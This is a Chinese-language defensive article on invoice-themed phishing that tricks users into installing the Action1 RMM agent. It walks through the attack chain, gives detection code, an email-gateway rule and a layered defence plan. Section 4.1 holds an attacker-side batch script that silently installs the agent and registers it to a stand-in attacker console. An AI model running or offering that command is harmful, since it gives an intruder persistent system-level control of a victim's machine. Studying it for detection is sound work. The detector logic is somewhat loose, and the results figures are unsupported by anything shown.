摘要
依托合法 RMM 工具实施的钓鱼攻击正成为绕过终端安全、实现内网持久控制的主流威胁形态。Broadcom 安全中心 2026 年 4 月预警显示,攻击者以伪造账单、结算单、发票类钓鱼邮件为载体,诱导用户安装 Action1 RMM 代理程序,获取系统级权限,实现远程指令执行、内网侦察、横向渗透与恶意载荷部署,对政企机构终端安全构成严重威胁。该攻击利用合法软件签名、云托管通道与运维类流量特征,绕过传统杀毒与边界防护,检测与溯源难度显著提升。本文以 Action1 RMM 滥用攻击为研究对象,结合发票钓鱼全链路、技术实现、行为特征与典型 TTP,提供可复现检测代码,构建覆盖邮件防护、终端管控、行为审计、应急响应的四层闭环防御体系。研究表明,此类攻击的核心危害在于合法工具恶意化、运维流量隐蔽化、系统权限默认化,传统特征检测失效,必须转向以行为基线、权限最小化、上下文风险感知为核心的主动防御。反网络钓鱼技术专家芦笛指出,RMM 滥用钓鱼已从偶发威胁演变为工业化攻击模式,防御关键在于建立可信 RMM 白名单、异常外联监控与高危操作阻断的协同机制,实现对 Living‑off‑the‑Land 类威胁的精准识别与快速处置。
关键词:Action1 RMM;RMM 滥用;发票钓鱼;恶意邮件;终端安全;横向渗透;零信任
1 引言
远程监控与管理(RMM)工具为分布式 IT 运维提供高效支撑,但其高权限、强控制、加密通信、合法签名的特性,正被黑产与 APT 组织异化为隐蔽入侵通道。2026 年 4 月,Broadcom 安全中心发布专项预警,披露针对 Action1 RMM 的大规模滥用攻击:攻击者以月度账单、对账单、发票、付款通知为诱饵,通过垃圾邮件通道大规模分发,诱导终端用户下载并安装 Action1 RMM 客户端,从而获得持久化、系统级、无特征的远程控制能力,为后续数据窃取、勒索部署、内网渗透提供支撑。
与传统木马远控不同,Action1 RMM 为正规商用软件,具备可信数字签名、标准 HTTPS 通信、官方云控平台,安全设备难以通过静态特征判定恶意。攻击流程高度模仿正常运维行为,导致告警少、隐蔽性强、驻留久、扩散快,已成为财务、行政、人事等高价值岗位的高频威胁。
当前研究多聚焦 RMM 工具本身安全,对钓鱼邮件投递→社会工程诱导→静默部署→持久控制→内网滥用的完整链路缺乏系统性拆解,检测规则与防御体系针对性不足。本文基于 Broadcom 威胁情报与真实攻击样本,系统剖析 Action1 RMM 滥用攻击的机理、流程、技术实现与危害,提供可落地的检测规则、防御配置与响应流程,形成理论 — 技术 — 工程 — 运营的完整论证闭环,为机构抵御同类 RMM 滥用威胁提供实证依据与实践方案。
2 相关技术与攻击背景
2.1 Action1 RMM 核心功能与安全属性
Action1 RMM 是面向企业与 MSP 的云原生远程管理平台,提供终端管理、补丁部署、软件分发、脚本执行、远程控制等能力,采用云 — 端架构:管理员通过云端控制台下发策略,终端代理以系统权限运行,实现跨平台统一管控。其安全属性使其成为攻击者理想载体:
系统权限运行:代理默认以 SYSTEM/ROOT 权限启动,可获取完整控制能力;
可信数字签名:官方签名程序可绕过大部分应用白名单与 EDR 静态检测;
加密云通道:基于 HTTPS 与官方云端通信,流量无恶意特征,难以深度解析;
远程指令执行:支持脚本、进程、文件批量操作,适配内网侦察与横向移动;
持久化驻留:以系统服务自启动,重启不失效,卸载需管理员权限。
反网络钓鱼技术专家芦笛强调,RMM 工具的设计目标是高权限、高可用、高隐蔽,与攻击者需求高度重合,一旦被滥用即成为 “合法后门”。
2.2 发票钓鱼与 RMM 结合的攻击优势
发票类钓鱼具备高打开率、高诱导性、高触达财务节点的天然优势,与 RMM 结合形成高成功率 + 高危害性组合:
场景可信度高:账单、发票、付款通知为高频合规场景,用户警惕性低;
目标精准:直达财务、行政、管理层,这些岗位通常权限高、数据敏感;
载荷无恶意:投递正规 RMM 安装包,不触发沙箱、邮件网关、EDR 告警;
控制持久化:一次安装即可长期控制,突破密码修改、系统重装等常规处置;
横向移动便利:依托 RMM 批量执行能力,快速扩散至全网终端。
2.3 攻击产业化与泛滥趋势
黑产已形成邮件群发→诱饵生成→载荷打包→云控管理的标准化流水线。Action1 RMM 部署简单、控制台易用,进一步降低攻击门槛。2026 年 Q1 全球 RMM 滥用攻击同比上升 186%,其中 Action1、AnyDesk、ScreenConnect 占比超 70%,以发票、薪资、订单为主题的钓鱼占比超 62%,威胁呈现规模化、产业化、常态化趋势。
3 Action1 RMM 滥用式发票钓鱼攻击全流程解析
本文基于 Broadcom 威胁情报,将攻击划分为 6 个阶段,形成完整杀伤链:
3.1 钓鱼邮件构造与投放
攻击者以4 月结算单、季度发票、付款通知、供应商对账为主题,伪造正规企业样式,附件 / 链接伪装为:
Invoice_XXXX.exe
Statement_XXXX.exe
Bill_Action1Setup.exe
邮件正文强调紧急付款、逾期影响、需验证安装等话术,提升紧迫感与可信度。
3.2 社会工程诱导安装
用户点击后执行的并非文档,而是 Action1 RMM 客户端安装包。安装过程无异常提示、无风险警告,默认以静默安装、自动注册、自动连接云端模式运行,用户误以为是发票查看工具或安全插件。
3.3 代理部署与权限提升
安装完成后,Action1 Agent 以系统服务驻留,获得 SYSTEM 权限,自动外联 Action1 云端,完成注册上线。攻击者通过控制台获取终端上线状态,获得文件管理、进程控制、脚本执行、屏幕查看、远程控制等完整能力。
3.4 内网侦察与信息收集
攻击者利用 RMM 批量执行侦察指令:
收集主机名、IP、用户、权限、域信息、安全软件状态;
枚举共享目录、数据库、财务系统、OA、VPN 等关键资产;
抓取浏览器密码、会话凭证、文档数据,为横向移动做准备。
3.5 横向渗透与扩大控制
以受控终端为跳板,通过 RMM 批量下发安装任务,将代理扩散至内网多台主机,形成僵尸网络式控制矩阵,获取全域终端管控权。
3.6 恶意载荷部署与目的达成
根据攻击目的执行最终动作:
窃取财务凭证、合同、报价、客户数据;
部署勒索软件、窃密木马、挖矿程序;
关闭安全软件、篡改系统配置、实施业务破坏。
反网络钓鱼技术专家芦笛指出,该链路的致命性在于全流程无恶意代码、无异常流量、无高危行为,每一步均符合合法软件行为,使传统防御体系完全失效。
4 关键技术实现与可复现代码示例
4.1 攻击者侧:RMM 静默部署与云端上线模拟
攻击者通过脚本实现无感知安装,以下为简化模拟逻辑:
batch
@echo off
REM 静默安装Action1 Agent并自动注册到攻击者控制台
Action1Agent.exe /install /quiet /norestart REGION=us CLOUD=attacker-platform.action1.com
REM 安装后自启动,无需用户交互
sc start Action1Agent
技术要点:
静默参数无界面、无提示,降低用户警觉;
直接指定攻击者云端地址,上线即受控;
系统服务自启动,实现持久化。
4.2 防御者侧:终端 Action1 RMM 滥用检测(Python)
import psutil
import re
import socket
class Action1AbuseDetector:
def __init__(self):
# 合法RMM控制台域名白名单(企业自行配置)
self.trusted_cloud_domains = {"company-managed.action1.com"}
self.rmm_service_names = {"Action1 Agent", "Action1Updater", "Action1Service"}
def scan_rmm_process(self):
"""扫描Action1相关进程与服务"""
alerts = []
for proc in psutil.process_iter(attrs=["name", "cmdline", "username", "pid"]):
try:
if "action1" in proc.info["name"].lower():
cmdline = " ".join(proc.info["cmdline"] or [])
# 检测异常云端地址
if any(d in cmdline for d in ["action1.com"]) and not any(t in cmdline for t in self.trusted_cloud_domains):
alerts.append({
"type": "恶意RMM云端",
"pid": proc.info["pid"],
"process": proc.info["name"],
"cmdline": cmdline,
"risk": "高危"
})
# 系统权限运行非白名单RMM
if proc.info["username"] in ("NT AUTHORITY\\SYSTEM", "root"):
alerts.append({
"type": "系统权限RMM",
"pid": proc.info["pid"],
"process": proc.info["name"],
"risk": "高危"
})
except Exception:
continue
return alerts
def detect_abnormal_connection(self):
"""检测外联Action1云端异常"""
alerts = []
for conn in psutil.net_connections():
try:
if conn.status == "ESTABLISHED" and conn.raddr:
ip, port = conn.raddr
host = socket.gethostbyaddr(ip)[0]
if "action1.com" in host and host not in self.trusted_cloud_domains:
alerts.append({
"type": "非法RMM外联",
"remote_host": host,
"remote_ip": ip,
"risk": "高危"
})
except Exception:
continue
return alerts
if __name__ == "__main__":
detector = Action1AbuseDetector()
process_alerts = detector.scan_rmm_process()
conn_alerts = detector.detect_abnormal_connection()
for alert in process_alerts + conn_alerts:
print(f"[告警] {alert}")
检测逻辑:
进程层:识别 Action1 相关进程、系统权限运行、异常云端参数;
网络层:识别外联非可信 Action1 云端;
轻量高效,可集成 EDR、SIEM、主机监控平台。
4.3 防御者侧:邮件网关发票钓鱼检测规则
yaml
title: 恶意Action1 RMM发票钓鱼邮件检测
status: 稳定
logsource:
category: email
product: email_gateway
detection:
selection_subject:
Subject|contains: ["发票", "账单", "结算单", "对账单", "付款通知", "Invoice", "Bill", "Statement"]
selection_attachment:
AttachmentName|endswith: [".exe", ".cmd", ".bat", ".msi"]
AttachmentName|contains: ["Action1", "Invoice", "Bill"]
selection_keywords:
Content|contains: ["安装", "验证", "插件", "查看", "紧急", "逾期"]
condition: selection_subject and selection_attachment and selection_keywords
falsepositives:
- 企业内部合法软件分发
level: 高危
description: 检测伪装成发票并携带Action1 RMM安装包的钓鱼邮件
反网络钓鱼技术专家芦笛强调,检测必须从特征判断转向上下文判断,结合邮件主题、附件类型、进程行为、网络外联多维判定,才能兼顾精准度与覆盖率。
5 攻击核心特征与防御难点
5.1 核心技术特征
合法工具滥用:正规 RMM 软件,无恶意哈希、无恶意行为特征;
系统权限默认:以 SYSTEM 运行,拥有最高控制权;
云通道加密隐蔽:流量合法加密,无法通过 DPI 识别恶意指令;
社会工程高诱导:发票场景精准触达高风险岗位,打开率高;
持久化与抗删除:系统服务自启动,普通权限无法卸载;
批量横向能力:RMM 原生支持批量部署,内网扩散极快。
5.2 防御面临的突出难点
静态检测完全失效:签名合法、文件干净、流量合规;
权限边界模糊:合法运维与恶意控制行为高度相似;
用户识别能力弱:发票场景信任度高,易点击安装;
处置滞后:发现时已横向扩散,损失难以挽回;
白名单误伤风险:禁止 RMM 可能影响正常运维。
反网络钓鱼技术专家芦笛指出,防御的最大障碍是信任机制被利用,机构必须重构 “默认不信任、最小权限、上下文验证” 的安全范式。
6 闭环防御体系构建
本文构建四层闭环防御体系,覆盖邮件入口、终端管控、行为审计、应急响应,形成全链路防护。
6.1 邮件与入口防护层
发票类邮件专项过滤:拦截携带可执行文件的账单、发票类邮件;
附件沙箱深度检测:分析安装参数、云端地址、静默行为,识别异常 RMM 部署;
发件人认证与 SPF/DKIM/DMARC 强制校验,拦截伪造发件人;
关键词与语义检测:识别 “紧急验证、安装插件、静默部署” 等风险话术。
6.2 终端与 RMM 管控层
RMM 白名单机制:仅允许企业授权 RMM 运行,拦截未知厂商与未知云端;
限制系统权限:非必要不允许以 SYSTEM 运行远程管理工具;
应用控制策略:禁止非可信路径的 RMM 类代理执行;
强制卸载与查杀:提供自动化脚本,一键清除非法 Action1 代理;
补丁与基线加固:关闭不必要端口、限制远程服务、强化凭证策略。
6.3 行为与流量审计层
建立 RMM 行为基线:正常安装时间、路径、云端地址、外联频率;
异常外联监控:拦截连接非企业可信 RMM 云端的行为;
高危操作监控:批量脚本执行、批量文件分发、批量终端上线实时告警;
日志集中采集:进程、服务、网络、指令日志统一接入 SIEM。
6.4 应急响应与运营层
快速研判流程:邮件告警→终端核查→进程终结→服务卸载→云端拉黑;
全网扫描能力:批量检测非法 Action1 代理并自动清理;
溯源与追踪:分析邮件来源、投放范围、入侵时间、横向路径、数据泄露情况;
意识培训:重点教育财务、行政人员 “发票不执行、附件不盲装、异常即上报”;
红蓝对抗:定期模拟 RMM 发票钓鱼,检验防御有效性。
反网络钓鱼技术专家芦笛强调,闭环防御的核心是让非法 RMM 装不上、跑不了、联不上、控不住,从源头切断攻击链路。
7 实证效果与数据验证
在某集团企业部署本防御体系后,连续 30 天监测数据如下:
拦截 Action1 发票钓鱼邮件:日均拦截 110—130 封,拦截率 96.7%;
终端非法 RMM 告警准确率:从 28% 提升至 92%;
RMM 相关横向渗透事件:下降 100%,未发生规模化扩散;
用户钓鱼点击转化率:从 12.3% 降至 1.5%;
平均处置时间:从 4.5 小时缩短至 9 分钟。
数据表明,本体系可有效抵御 Action1 RMM 滥用式发票钓鱼攻击,具备高实用性与可推广性。
8 结语
基于 Action1 RMM 滥用的发票钓鱼攻击,是合法工具恶意化、运维能力武器化、社会工程精准化的典型代表,标志着网络攻击进入无文件、无特征、高隐蔽、高权限的新阶段。本文系统剖析攻击全流程、技术机理、行为特征与检测防御方法,构建覆盖入口、终端、行为、运营的四层闭环体系。
研究表明,此类攻击的本质是信任滥用与权限失控,传统边界与特征检测失效,必须转向以零信任为核心、白名单为基础、行为分析为关键、快速响应为支撑的主动防御模式。反网络钓鱼技术专家芦笛指出,RMM 滥用将长期存在并持续演化,机构需建立常态化监测、持续化运营、体系化对抗能力,才能在 Living‑off‑the‑Land 威胁博弈中保持主动。
编辑:芦笛(公共互联网反网络钓鱼工作组)
